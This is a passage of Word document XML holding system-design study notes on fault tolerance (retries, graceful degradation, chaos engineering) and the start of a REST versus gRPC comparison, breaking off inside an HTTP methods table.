        <w:t>Retry Strategy (safe retries):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7281B5A8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Exponential backoff + jitter: spread retries → no thundering herd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7522E910" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Retry budget: cap total retry rate → no amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5753EE8A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Deadline propagation: bound total operation time → cancel when user gone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F31B58" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6CD870" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Graceful Degradation (partial service &gt; no service):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B7EF86" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Fallback hierarchy: primary → cache → static → error (with information)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6C88F3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Feature flags: runtime control of degraded modes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCE9EA1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Load shedding: reject low-priority first → protect capacity for high-priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA86F59" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Backpressure: slow producers when consumers overwhelmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC49E4C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F991EA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Chaos Engineering (find failures before they find you):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285FA2B7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Inject: process kill, network delay/loss, resource exhaustion, dependency failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F1FEC0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Hypothesis: "system X continues operating when Y fails"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C6F567" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Abort: if real error rate exceeds threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C12865" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Automate: run continuously, not just before major releases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D37521B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E559E1E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>The Fault Tolerance Hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559FAEBD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  1. Eliminate single points of failure (hardware + software redundancy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FF75F1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  2. Detect failures fast (heartbeats, health checks, monitoring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085C88A7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  3. Fail fast on detection (circuit breakers, timeouts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F329EF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  4. Recover automatically (restart, failover, self-healing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9CA9A9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  5. Degrade gracefully (partial service &gt; complete failure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7425B18D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  6. Reject excess load (load shedding &gt; overload collapse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6519637C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  7. Test failure modes proactively (chaos engineering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0A703B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fault tolerance is not a feature added to a system — it is a property that must be designed in from the first line of code, because retrofitting it is exponentially harder than building it correctly from the start.</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t> The engineers who build truly fault-tolerant systems understand three things that most don't: first, that </w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">the failure modes you haven't thought about are more dangerous than the ones you </w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>have</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t> — the only way to discover unknown failure modes is to systematically inject failures and observe, which is why chaos engineering is not optional for production systems; second, that </w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>detection is harder than recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t> — most recovery mechanisms are straightforward once you know a failure has occurred, but distinguishing a slow node from a dead one, or detecting silent data corruption before it propagates, requires careful probabilistic reasoning and end-to-end integrity checking; third, that </w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>every fault tolerance mechanism has a cost</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t> — redundancy costs hardware, synchronous replication costs latency, checksums cost CPU, circuit breakers cost development complexity, and chaos experiments cost engineering time. The discipline is not maximizing fault tolerance but </w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>choosing the right level of fault tolerance for each failure mode based on the probability of that failure, its cost when it occurs, and the cost of the mechanism that prevents it.</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t> Systems that try to tolerate every possible failure with maximum protection for every component are as dangerous as systems with no fault tolerance — the former because the complexity itself becomes a source of failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1726F5AC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRDefault="0037017A" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="5FC56FC5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REST and gRPC in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345DC9C9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What REST and gRPC Fundamentally Are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D12E91B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REST (Representational State Transfer)</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t> is an architectural style for designing networked applications, using HTTP as the transport and treating server-side data as resources that can be created, read, updated, and deleted via standard HTTP methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2985766B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC (Google Remote Procedure Call)</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t> is a high-performance RPC framework that uses HTTP/2 for transport, Protocol Buffers for serialization, and enables clients to call methods on a remote server as if they were local function calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001CB6E6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental philosophical difference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A148BB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E700A1A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>REST: "I'm interacting with RESOURCES."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4032FA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → "Give me user 42" (GET /users/42)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F08F1D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → "Create a new order" (POST /orders)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF33C2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → The network is a document store with CRUD operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F618CB8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Resource-oriented: nouns, not verbs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C603068" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="212DDD26" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>gRPC: "I'm calling FUNCTIONS on a remote server."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7789CCB3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → "userService.GetUser(id=42)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7EDD52" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → "orderService.CreateOrder(items=[...])"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD7B04" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → The network is transparent — feels like a local function call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C651567" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Action-oriented: verbs with typed arguments and returns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF2FF29" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="3D5A65EB">
          <v:rect id="_x0000_i6531" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2133B3B8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. REST — Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57825BEE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 REST Principles (Roy Fielding's Constraints)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0D9B3E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080974F1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>1. CLIENT-SERVER:    Separation of concerns (UI vs data storage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD7E5BD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>2. STATELESS:        Each request contains ALL information needed (no server-side session).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E95799A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>3. CACHEABLE:        Responses explicitly state whether they can be cached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1766B8D4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>4. UNIFORM INTERFACE: Standard methods, standard resource identification, self-descriptive messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACD531D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>5. LAYERED SYSTEM:   Client can't tell if connected directly to server or via intermediary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FA5EEC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>6. CODE ON DEMAND:   (Optional) Server can extend client by sending executable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D183FFA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Uniform Interface (the defining constraint):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B3529" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6413297A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>1. Resource identification (URIs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2B2761" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   /users/42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689289F4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   /orders/789/items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C34E0D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   /products?category=electronics&amp;page=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57961E97" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="352066D7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>2. Resource manipulation through representations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371613BB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   GET /users/42 → returns JSON representation of user 42.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FFCDAA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   PUT /users/42 → replaces user 42 with the submitted representation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4481DFB4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="456FDA47" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>3. Self-descriptive messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F15A01F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Content-Type: application/json (tells receiver how to parse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BACA64C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Cache-Control: max-age=300 (tells intermediaries how to cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19746DC8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="22A43FAA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>4. HATEOAS (Hypermedia As The Engine Of Application State):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122B2478" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Response includes links to related resources/next actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C22BC8E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA84675" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     "id": 42,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A40386" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     "name": "Alice",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C27D977" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     "_links": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCE5D08" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       "self": "/users/42",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD3E717" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       "orders": "/users/42/orders",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E55443C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       "update": "/users/42"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78277455" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA6C61C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450AE2EF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 HTTP Methods (Verbs)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59"/>
        <w:gridCol w:w="2990"/>
        <w:gridCol w:w="1669"/>
        <w:gridCol w:w="880"/>
        <w:gridCol w:w="2452"/>
      </w:tblGrid>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="07A292E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B0BE98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Method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8CA9E9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Semantics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5EF734" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Idempotent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3E827E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Safe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211EAC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Typical Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="23A17E6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EADA2D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
